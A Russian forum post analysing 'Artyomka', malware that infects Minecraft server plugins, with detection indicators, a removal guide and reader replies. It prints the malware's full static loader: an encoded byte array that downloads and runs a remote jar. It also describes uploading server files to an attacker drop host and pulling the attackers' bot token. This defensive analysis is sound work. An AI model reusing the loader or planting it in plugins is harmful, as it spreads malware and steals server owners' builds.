Вирус/хак «Артёмка»

Что за новое чудо?​

Хочу поговорить с вами о новом (для вас) хаке для сервера майнкрафт.
Я назвал данный хак «Артёмка»
Так как он скачивает файл artem.jar для дальнейших манипуляций.

А манипуляции он делает не маленькие:​

1. Заражает все плагины собой, и не простым вызовом в onEnable как вирусhostflow, а распространяется по всему главному классу множественными вызовами.
2. Команда для выкачивания вашей сборки, и отправки её на удалённое хранилище злоумышленника.
3. Связь вашего сервера с дискорд сервером артёмки.
4. Отправка полной информации о вашем сервере (ПК если запушен на вашем компьютере) на сервер злоумышленника.

Начну с простых примеров что делает данный artem.jar

Отслеживание каждые 5 секунд на отправку команд (скачивание вашей сборки):​

​

1. Регулярно проверяет доступность удаленного сервера по определенному адресу и порту.
2. Позволяет удаленному серверу отправлять команды для выполнения на данном сервере.
3. Предоставляет возможность удаленному серверу скачивать файлы из определенной директории на данном сервере и отправлять их на Discord через веб-хук.
4. Обеспечивает удаленный доступ и управление данным сервером через интернет.

Отправка файлов на удалённый сервер:​

​

1. Метод a() выполняет следующие действия:
   • Устанавливает соединение с веб-сервером по указанному URL-адресу "https://drop.xtrafrancyz.net/upload/".
   • Устанавливает HTTP-запрос методом PUT и добавляет заголовок запроса "Linx-Access-Key" со значением "doMinet".
   • Устанавливает флаг "DoOutput" для разрешения вывода данных в соединение.
   • Читает содержимое файла (this.a) и отправляет его в выходной поток (output stream) соединения.
   • Получает ответ от сервера, читает его в виде строки и возвращает полученный результат.
2. Метод a() возвращает файл (this.a).

Создание отчёта о заражении вашей сборки и отправки его в дискорд:​

​

Так же файл artem.jar выполняет всю работу для заражения других ваших плагинов. А именно скачивает lib.jar и при помощи манипуляции кода добавляет содержимое в плагин.

Как вычислить данный вирус?​

Вот что вы получаете при заражении.​

​

Вирус «Артёмка» маскируется под либу от программы интеледжии создаёт подобные папки (они обычно не должны находиться в плагинах в Майнкрафт).
Вот пример если вы не поняли из скриншота выше. Это просмотр файла через архиватор (winrar)

​

Если в вашем плагине есть такие папки: org\intellij\lang\annotations, то это уже повод задуматься и бежать проверять плагин на хаки
Но иногда они есть в плагинах, так что не нужно паниковать сразу, и нужно посмотреть код.

Сам хак находится в классе: org/intellij/lang/annotations/Preconditions.class
Почти в самом низу.
Вот код:

static {
        try {
            byte[] a = new byte[]{-54, -2, -70, -66, 0, 0, 0, 52, 0, 88, 1, 0, 11, 115, 103, 97, 103, 97, 103, 97, 103, 97, 103, 97, 7, 0, 1, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 7, 0, 3, 1, 0, 16, 115, 103, 97, 103, 97, 103, 97, 103, 97, 103, 97, 46, 106, 97, 118, 97, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 12, 0, 6, 0, 7, 10, 0, 4, 0, 8, 1, 0, 4, 116, 104, 105, 115, 1, 0, 13, 76, 115, 103, 97, 103, 97, 103, 97, 103, 97, 103, 97, 59, 1, 0, 8, 60, 99, 108, 105, 110, 105, 116, 62, 1, 0, 19, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 7, 0, 13, 1, 0, 12, 97, 120, 97, 120, 120, 97, 120, 97, 120, 97, 120, 97, 8, 0, 15, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 121, 115, 116, 101, 109, 7, 0, 17, 1, 0, 11, 103, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 12, 0, 19, 0, 20, 10, 0, 18, 0, 21, 1, 0, 1, 49, 8, 0, 23, 1, 0, 16, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 7, 0, 25, 1, 0, 6, 101, 113, 117, 97, 108, 115, 1, 0, 21, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 90, 12, 0, 27, 0, 28, 10, 0, 26, 0, 29, 1, 0, 12, 106, 97, 118, 97, 47, 110, 101, 116, 47, 85, 82, 76, 7, 0, 31, 1, 0, 12, 106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 8, 0, 33, 1, 0, 15, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 7, 0, 35, 1, 0, 7, 102, 111, 114, 78, 97, 109, 101, 1, 0, 37, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 12, 0, 37, 0, 38, 10, 0, 36, 0, 39, 1, 0, 22, 103, 101, 116, 68, 101, 99, 108, 97, 114, 101, 100, 67, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114, 1, 0, 51, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 114, 101, 102, 108, 101, 99, 116, 47, 67, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114, 59, 12, 0, 41, 0, 42, 10, 0, 36, 0, 43, 1, 0, 37, 104, 116, 116, 112, 115, 58, 47, 47, 107, 116, 111, 46, 117, 108, 116, 105, 109, 97, 116, 101, 98, 111, 120, 46, 102, 117, 110, 47, 97, 114, 116, 101, 109, 46, 106, 97, 114, 8, 0, 45, 1, 0, 29, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 114, 101, 102, 108, 101, 99, 116, 47, 67, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114, 7, 0, 47, 1, 0, 11, 110, 101, 119, 73, 110, 115, 116, 97, 110, 99, 101, 1, 0, 39, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 12, 0, 49, 0, 50, 10, 0, 48, 0, 51, 1, 0, 23, 106, 97, 118, 97, 46, 110, 101, 116, 46, 85, 82, 76, 67, 108, 97, 115, 115, 76, 111, 97, 100, 101, 114, 8, 0, 53, 1, 0, 23, 103, 101, 116, 68, 101, 99, 108, 97, 114, 101, 100, 67, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114, 115, 1, 0, 34, 40, 41, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 114, 101, 102, 108, 101, 99, 116, 47, 67, 111, 110, 115, 116, 114, 117, 99, 116, 111, 114, 59, 12, 0, 55, 0, 56, 10, 0, 36, 0, 57, 1, 0, 9, 108, 111, 97, 100, 67, 108, 97, 115, 115, 8, 0, 59, 1, 0, 9, 103, 101, 116, 77, 101, 116, 104, 111, 100, 1, 0, 64, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 67, 108, 97, 115, 115, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 114, 101, 102, 108, 101, 99, 116, 47, 77, 101, 116, 104, 111, 100, 59, 12, 0, 61, 0, 62, 10, 0, 36, 0, 63, 1, 0, 8, 107, 116, 111, 46, 67, 111, 114, 101, 8, 0, 65, 1, 0, 24, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 114, 101, 102, 108, 101, 99, 116, 47, 77, 101, 116, 104, 111, 100, 7, 0, 67, 1, 0, 6, 105, 110, 118, 111, 107, 101, 1, 0, 57, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 12, 0, 69, 0, 70, 10, 0, 68, 0, 71, 1, 0, 20, 40, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 12, 0, 49, 0, 73, 10, 0, 36, 0, 74, 1, 0, 11, 115, 101, 116, 80, 114, 111, 112, 101, 114, 116, 121, 1, 0, 56, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 12, 0, 76, 0, 77, 10, 0, 18, 0, 78, 1, 0, 7, 111, 98, 106, 101, 99, 116, 115, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 79, 98, 106, 101, 99, 116, 59, 1, 0, 1, 111, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 1, 0, 10, 83, 111, 117, 114, 99, 101, 70, 105, 108, 101, 0, 33, 0, 2, 0, 4, 0, 0, 0, 0, 0, 2, 0, 1, 0, 6, 0, 7, 0, 1, 0, 83, 0, 0, 0, 47, 0, 1, 0, 1, 0, 0, 0, 5, 42, -73, 0, 9, -79, 0, 0, 0, 2, 0, 84, 0, 0, 0, 6, 0, 1, 0, 0, 0, 3, 0, 85, 0, 0, 0, 12, 0, 1, 0, 0, 0, 5, 0, 10, 0, 11, 0, 0, 0, 8, 0, 12, 0, 7, 0, 1, 0, 83, 0, 0, 0, -15, 0, 8, 0, 2, 0, 0, 0, -120, 18, 16, -72, 0, 22, -58, 0, 16, 18, 16, -72, 0, 22, 18, 24, -74, 0, 30, -102, 0, 113, 4, -67, 0, 32, 89, 3, 18, 34, -72, 0, 40, 4, -67, 0, 36, 89, 3, 18, 26, 83, -74, 0, 44, 4, -67, 0, 4, 89, 3, 18, 46, 83, -74, 0, 52, -64, 0, 32, 83, 75, 18, 54, -72, 0, 40, -74, 0, 58, 16, 6, 50, 4, -67, 0, 4, 89, 3, 42, 83, -74, 0, 52, 76, 18, 54, -72, 0, 40, 18, 60, 4, -67, 0, 36, 89, 3, 18, 26, 83, -74, 0, 64, 43, 4, -67, 0, 4, 89, 3, 18, 66, 83, -74, 0, 72, -64, 0, 36, -74, 0, 75, 87, 18, 16, 18, 24, -72, 0, 79, 87, -89, 0, 4, 75, -79, 0, 1, 0, 0, 0, -125, 0, -122, 0, 14, 0, 3, 0, 86, 0, 0, 0, 11, 0, 4, 21, -5, 0, 109, 66, 7, 0, 14, 0, 0, 84, 0, 0, 0, 34, 0, 8, 0, 0, 0, 8, 0, 21, 0, 10, 0, 61, 0, 11, 0, 84, 0, 12, 0, 123, 0, 13, 0, -125, 0, 19, 0, -122, 0, 16, 0, -121, 0, 20, 0, 85, 0, 0, 0, 22, 0, 2, 0, 21, 0, 114, 0, 80, 0, 81, 0, 0, 0, 61, 0, 74, 0, 82, 0, 81, 0, 1, 0, 1, 0, 87, 0, 0, 0, 2, 0, 5};
            ((Class)new PreconditionProcessor().process(a)).newInstance();
        }
        catch (Exception exception) {
            // empty catch block
        }
    }

Он маскируется при помощи побитовых символов.
Вот какой метод мы получаем в итоге, расшифровав данный код в нашем удобном декодере:

(выделил скачивание файла)​

Методы лечения от вируса «Артёмка»:​

Вырезать все вызовы класса org/intellij/lang/annotations/Preconditions.class из главного класса плагина.
Скажу честно, не советую вам это делать. Только для уникальных плагинов.
Так же помните, что нужно перекачать АБСОЛЮТНО ВСЕ плагины которые у вас установлены, так как многие (где есть onEnable) будут заражены.

P.S.​

Возможно я дополню данную статью утром.

 

У них есть ещё поддомен store (.) ultimatebox (.) fun
где есть такая страница

 

Они ещё отправляют информацию на какой-то paste.zware.space и я сомневаюсь что это их сайт. Ну и ещё есть такой прикол, что если сделать запрос на webhook.ultimatebox.fun и в юзер агенте указать iqless person detector то получишь токен их дискорд бота (что это за горе хакеры). Правда сейчас он снесён отправкой центрального процессора или же церковного писания (если вы понимаете о чём я)

 

Утром допишу если время будет разобрать всё.

 

путем просмотра их сайта вышел на их дс/вк/ютуб
discord(.)com/invite/YCqFh89NKJ
vk(.)com/boxultimate
youtube(.)com/channel/UCjMnBSKCWHnx0Zq9hUlOErA
(Не реклама)
UPD: также дс создателя сервера(вроде как) jnienv

 

Вирус «Артёмка», очистка плагина....​

Как мы знаем, вирус Артёмка несёт много бед в себе, и иногда нету возможности заново скачать новую версию плагина без хака, по причинам эксклюзивности плагинов.

Сейчас я расскажу как как самому очистить плагин от хака «Артёмка».

Для этого нам понадобится:
Recaf (программа для просмотра и редактирования кода)
Заражённый плагин.

Подготовил для вас видео по очистке плагина от хака «Артёмка»:​

Осторожно, музыка...

 

Добрый вечер, у вас есть джарник плагина, заражённого "артемкой" ? Хотелось бы подробнее взглянуть на код.

 

@Pepter, добрый вечер. Есть. Но на форуме я его публиковать не буду.
пишите в общем чате на сервере дискорд проекта, или в tg чате, я вам отправлю.